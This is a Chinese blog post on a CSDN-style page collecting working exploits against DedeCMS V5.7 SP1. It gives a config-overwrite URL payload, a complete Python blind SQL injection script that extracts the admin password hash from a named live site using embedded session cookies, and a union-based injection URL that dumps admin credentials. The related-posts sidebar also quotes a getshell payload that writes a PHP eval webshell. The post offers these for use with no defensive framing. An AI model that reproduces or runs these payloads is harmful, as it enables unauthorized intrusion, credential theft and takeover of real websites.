dedecms的漏洞

最新推荐文章于 2024-04-05 09:44:31 发布
最新推荐文章于 2024-04-05 09:44:31 发布
阅读量2.7k 收藏 1
点赞数
分类专栏: 漏洞利用 文章标签: dedecms的漏洞payload
我希望自己永远怀着一颗学习的心!
本文链接:https://blog.csdn.net/q1352483315/article/details/90070068
版权

爆数据库 Dedecms V5.7 SP1:

直接payload一条龙服务哈

/plus/search.php?keyword=xxx&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&arrs1[]=108&arrs1[]=101&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=100&arrs2[]=97&arrs2[]=116&arrs2[]=97&arrs2[]=47&arrs2[]=99&arrs2[]=111&arrs2[]=109&arrs2[]=109&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=105&arrs2[]=110&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=0

SQL注入 Dedecms V5.7 SP1:

利用前提:member下注册功能开放
利用脚本:

#!/usr/bin/env python
# encoding:utf-8
# Date: 2015/12/25
# Created by 独自等待
# 博客 http://www.waitalone.cn/
import re
import random
import urllib2


def Get_respone(mtype_url, mdata='', method='get'):
    '发送数据包函数'
    headers = {
        'Cookie': 'PIDDAV253154=2019041022304518294570; FVTDAV253154=636905322478704625; PHPSESSID=thsqq6s84lc9h2sicf0sv6ir91; DedeUserID=9981; DedeUserID__ckMd5=28f81f2935375e34; DedeLoginTime=1555069244; DedeLoginTime__ckMd5=05d1ba08e4f839e5; OrdersId=e6a1UlIFCQQBAVFUAFVbAlEEBFdbWgIEUg4AAwNhGmUFUwdXUgMABwkHMyoGWlo; ENV_GOBACK_URL=%2Fmember%2Fcontent_list.php%3Fchannelid%3D1; LVTDAV253154=636906957184017134; VTSDAV253154=4; MSTSDAV253154=0; VPSDAV253154=31; SIDDAV253154=f908f9d9a2844172a8e829fa19997301; LROIDDAV253154=1000'
    }
    try:
        request = urllib2.Request(mtype_url, headers=headers)
        if method == 'post':
            response = urllib2.urlopen(request, data=mdata, timeout=10).read()
        else:
            response = urllib2.urlopen(request, timeout=10).read()
    except Exception, msg:
        print u'[X] 我擦,出错了!', msg
        raise SystemExit()
    else:
        return response


def Create_id():
    '创建分类函数'
    print u'\n[!] 分类ID不存在,正在创建!'
    response = Get_respone(mtype_url + '?dopost=add', 'mtypename=hacker&channelid=1', method='post')
    if '增加分类成功' in response:
        print u'\n[!] 分类创建成功,请重新执行程序!'
    else:
        print u'\n[X] 分类创建失败,请手工创建!'


def Get_id():
    '获取分类ID函数'
    response = Get_respone(mtype_url)
    if '系统关闭了会员功能' in response:
        print u'会员中心关闭,漏洞不存在!'
        raise SystemExit()
    else:
        type_reg = re.compile('mtypename\[(\d+)\]')
        idlist = type_reg.findall(response)
        if idlist: return idlist[0]


def Get_hash(typeid):
    '盲注获取admin密码'
    adminhash = ''
    md5_chars = list('abcdefghijklmnopqrstuvwxyz0123456789QWERTYUIOPLKJHGFDSAZXCVBNM')
    try:
        for i in range(1, 17):
            flag = random.random()
            for j in md5_chars:
                payload_pre = "?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name]["
                payload_cent = urllib2.quote(
                        "a' and `'`.``.mtypeid or if(ascii (substr((select left(substring(pwd,4),16) from dede_admin limit 1),"
                        + str(i) + ",1))=" + str(ord(j)) + ",1,0) and mtypeid=" + str(typeid) + "#"
                )
                payload_end = "]=" + str(flag) + "&_FILES[mtypename][size]=.xxxx]"
                payload = payload_pre + payload_cent + payload_end
                payload_res = Get_respone(mtype_url + payload)
                # print response
                match_res = Get_respone(mtype_url)
                if str(flag) in match_res:
                    print u'[!] 爷,正在爆破第 [%-2d] 位,字符为: %s' % (i, j)
                    adminhash = adminhash + j
                    break
    except KeyboardInterrupt:
        print u'[!] 爷,按您的吩咐,已成功退出!'
    else:
        if adminhash == '':
            print u'[X] 爷,杯具了,漏洞不存在!'
        else:
            print u'\n[¤] 爷,爆破完毕!密码为:', adminhash


if __name__ == '__main__':
    mtype_url = 'http://www.13sr.com/member/mtypes.php'
    typeid = Get_id()
    if typeid is None:
        Create_id()
    else:
        Get_hash(typeid)

远程文件包含漏洞 Dedecms V5.7 SP1:

通杀SQL注入漏洞 DedeCMS V5.7 20140201之前:

payload:http://baidu.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'or mid=@`\'`/*!50000union*//*!50000select*/1,2,3,(selectCONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111
小鱼儿waha
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python自动生成采集规则_Python爬虫结合dedecms自动采集发布
weixin_28877505的博客
02-11 817
之前想实现一个爬虫,实时采集别人的文章,根据自己的规则去修改采集到的文章,然后自动发布。决定用dedecms做新闻发布,还可以自动生成html,自动把远程图片本地化等一些优点,为了安全,完全可以把前后台分离。起初想用scrapy爬虫框架去实现,觉得定制开发的话用scrapy只能用到里面的一些基础的功能,有一些情况要跟着框架的规则走,如果自己写的话可以自己写规则去处理,也有优点爬虫、处理器等,最后还...
dedecms-v5.7-sp1远程文件包含getshell
What_Happened的博客
12-13 6250
前段时间自己搭了个dedecms-v5.7-sp1的靶机来练手,偶然在网上发现了一篇靠谱的文章,讲的是dedecms的一个远程文件包含getshell的方法,理解了以后决定自己再写出来,以加深印象~ 利用条件:首先,是目标站安装完cms后并没有删除install文件夹,漏洞文件为\install\index.php.bak 。       其次,目标站点的Apache存在文件解
渗透实战:dedeCMS任意用户密码重置到内网getshell
最新发布
qq_53058639的博客
04-05 1089
DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。通过信息泄露,攻击者可以获取到网站的用户的用户名和一些敏感信息,然后通过利用任意密码重置漏洞,在不知道原密码的情况下,重置管理员账号的密码,从而获取管理员权限。接着,攻击者可以通过后台getshell,获取网站的控制权,进而进行各种恶意操作,如上传恶意文件、篡改网站内容、窃取用户信息等。
dedecms 5.7sp1中/plus/download.php下载重定向漏洞
主流网络
12-27 3696
2015‎年‎12‎月‎18‎日从官网下载的DedeCMS-V5.7-UTF8-SP1中存在该漏洞。     今天在使用知道创宇的scan安全中心扫描网站时发现/plus/download.php存在url重定向漏洞(攻击者可利用该漏洞进行钓鱼等欺诈行为)。截图如下: 查看后发现在dedecms 5.7sp1的/plus/download.php中67行存在如下图中的代码,即接收参数后
dedecmsv5.7sp1远程文件包含漏洞审计
安全大白
10-27 767
漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖以至于最后引起远程文件包含漏洞
DedeCms v5.7 SQL注入漏洞
网站守护中心
04-13 5328
描述:DedeCms v5.7 SQL注入漏洞WASC Threat Classification 目标存在SQL注入漏洞。 1.SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。 - 收起 2.漏洞形成原因:dedecms v5.7的/member/ajax_membergroup.php脚本对用户提交给“membergroup”参数的数据在用于SQL查询前缺少过滤,
dedecms漏洞getshell EXP最新可用
weixin_33674976的博客
06-18 545
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`EXP:http://www.xxx.org/plus/download...
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
wLHK-Dedecms漏洞整理.pdf
09-20
wLHK-Dedecms漏洞整理 从给定的文件信息中,我们可以看到该文件是关于Dedecms漏洞的整理报告,包含了多个漏洞的详情,包括SQL注入漏洞、XSS漏洞等。下面我们将对这些漏洞进行详细的分析和解释。 首先,我们来看第...
DedeCMS 存储型xss漏洞1
08-03
DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
web应用漏洞.docx
07-05
这些漏洞来自于多种 Web 应用程序,如 ColdFusion、BEESCMS、DedeCMS、Discuz、Drupal、ECShop、ElasticSearch、eWebeditor、FengCMS、FineCMS、Gitlab、Gogs、JBoss、Jenkins、Jolokia、Joomla 等。 一、远程代码...
当了一回网管,见识了一下php的挂码方法
linux内核探索
10-18 4109
当了一回网管好长时间都没有更新博客了。这回也来写一把非研发的东西。问题起因是有一台有固定IP地址的web服务器,然后装的是windows版的。服务器上跑的是一个php的动态站点。后台用的是dedecms做为建站系统。但是最近以来。这个站点一直被挂马。倒底是windows服务器被攻破,还是网站被人上传了恶意的木马?不得而知。每回把服务器重新恢复,没过一段时间,又会被挂马,在首页最下端出现了“百度联盟”
plus/90sec.php,dedecms最新漏洞,可提权,20130713
weixin_34348050的博客
03-11 271
截至当前时间2013年7月13日 该漏洞还未进行修复。影响网站:所有dedecms 版本漏洞页面plus/download.php漏洞脚本plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=1...
织梦最新注入漏洞直接获取管理员帐号
weixin_33696822的博客
06-25 824
把以下代码一个个的复制到地址栏中并确定第一行算是一次确定网址/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs...
dedecmsv5.7sp1 文件包含和变量覆盖漏洞
小饼干的博客
06-28 1000
环境搭建:使用phpstudy,phpstudy版本2016,PHP版本5.4.45,mysql版本5.5.53 dedecms版本5.7 sp1 utf-8版 环境搭建好以后安装dedecms,安装完成以后访问一下 存在漏洞的地方在install/index.php文件中 在29到33行中存在变量覆盖,这段代码的大概意思是依次对_GET,_POST,_COOKIE进行键值分离 例如:_GET传入的参数是id=1,name=nfnf,在第一个foreach中先遍历_GET,此时$_request变为$_g
dedecms 5.7 一句话后门利用 exp
fengling132的专栏
04-22 1593
http://www.wooyun.org/bug.php?action=view&id=5416 shopcar.class.php 被植入一句话 @eval(file_get_contents('php://input')); 去官网下了一套回来,看了下代码, class MemberShops { var $OrdersId; var $productsId;
Dedecms 5.7 SP2后台getshell
一个安全研究员
07-02 9809
前言 最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台getshell的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手。该漏洞涉及的版本是dedecms的最新版吧,下载地址: http://www.dedecms.com/products/dedecms/downloads/ 复现 版本: 我这里测试的是utf8版,这个版本应该不影响。 漏洞位...
dedecms漏洞复现
03-28
由于 Dedecms 平台存在多个漏洞,以下是一个常见的 Dedecms 漏洞复现过程: 1. 扫描目标 Dedecms 站点,确定其版本号和漏洞类型。 2. 找到对应的漏洞利用代码,例如 Dedecms v5.7 SP2 sql注入漏洞利用代码: ``` http://www.target.com/search.php?kw=%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100%23 ``` 3. 将漏洞利用代码粘贴到浏览器地址栏并访问,如果出现错误信息或页面内容发生变化,则说明漏洞存在。 4. 利用漏洞进行攻击,例如获取敏感数据、添加管理员账户等。 需要注意的是,任何未经授权的攻击行为都是违法的,建议仅在合法的安全测试环境中进行漏洞复现和攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值